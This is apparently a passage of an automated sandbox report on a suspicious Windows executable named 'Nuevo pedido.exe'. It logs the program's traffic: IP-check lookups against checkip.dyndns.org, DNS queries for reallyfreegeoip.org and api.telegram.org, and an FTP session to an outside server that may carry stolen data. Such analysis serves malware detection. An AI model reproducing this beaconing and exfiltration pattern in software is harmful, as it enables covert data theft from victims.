Jan 9, 2025 16:36:28.206984043 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.211869955 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.325298071 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.326448917 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.331290007 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.444933891 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.445205927 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.450018883 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.563643932 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.572880030 CET	49779	32059	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.577816010 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.577896118 CET	49779	32059	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.577986956 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.582773924 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.984383106 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.984699965 CET	49779	32059	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.984766960 CET	49779	32059	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.989537954 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.989587069 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.989600897 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.989717007 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.989743948 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.989861012 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.990093946 CET	32059	49779	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.990159988 CET	49779	32059	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:29.039405107 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:29.113235950 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:29.164499998 CET	49778	21	192.168.2.4	50.31.176.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 16:36:00.934256077 CET	52399	53	192.168.2.4	1.1.1.1
Jan 9, 2025 16:36:00.941251993 CET	53	52399	1.1.1.1	192.168.2.4
Jan 9, 2025 16:36:01.594521999 CET	56465	53	192.168.2.4	1.1.1.1
Jan 9, 2025 16:36:01.602710962 CET	53	56465	1.1.1.1	192.168.2.4
Jan 9, 2025 16:36:12.861273050 CET	55833	53	192.168.2.4	1.1.1.1
Jan 9, 2025 16:36:12.867985964 CET	53	55833	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 16:36:00.934256077 CET	192.168.2.4	1.1.1.1	0x9de6	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.594521999 CET	192.168.2.4	1.1.1.1	0xc852	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:12.861273050 CET	192.168.2.4	1.1.1.1	0x8621	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:00.941251993 CET	1.1.1.1	192.168.2.4	0x9de6	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:01.602710962 CET	1.1.1.1	192.168.2.4	0xc852	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 16:36:12.867985964 CET	1.1.1.1	192.168.2.4	0x8621	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:00.970580101 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:01.428589106 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 211f565b43e1eb70ba6fa4a4a1098ff0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:01.433715105 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:01.534163952 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0b9d9243521b7da725ea78affb4ef03b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:01.743089914 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0b9d9243521b7da725ea78affb4ef03b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:02.806159973 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:04.052448034 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 453703f0ec4f15828ed2dacd2189e95b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:04.123101950 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 453703f0ec4f15828ed2dacd2189e95b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:04.697592020 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:05.179434061 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1aaaf96c8efa1919d1afa6a7dec37f84 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:05.618122101 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:06.122505903 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bc18746e2801475e74fb745fbfc25862 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:06.127437115 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:06.247389078 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 175692431c13ec49331ffaea168f8f95 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 16:36:07.084819078 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:07.322189093 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fbf4bcd0bf30dd9027cfe7b39684ff4c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:05.854659081 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:06.369398117 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a31ca3cdf76c8fa07dba16cb12cd7d41 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:07.022197962 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:07.557416916 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d3a6a22ce7f550f4f5bada3cd1b62acd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:08.161607981 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 16:36:08.635428905 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 597fc91d00f22d6ee7d42473b6490ce7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:08.299448013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:08.771614075 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: caa2266df07de448d2888e3f23cd9871 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:09.278423071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:09.768116951 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb58b2a6934cf63c7f83560e3de34cdd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:09.381845951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:09.846118927 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 59c276d3f4db5d55a66815a55b67d233 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:10.384701014 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:10.866734028 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c0c10931d47f7653e5848ea03949f1f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:10.474456072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:10.967573881 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d4b3e1f75593411221e05540ede84a11 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	193.122.130.0	80	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:11.640180111 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:12.117563963 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb56b72d1cee8e9f0352a17db895ee54 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49760	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:11.684587002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:12.156908989 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b9e0da751d01b705d276a127787e23e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

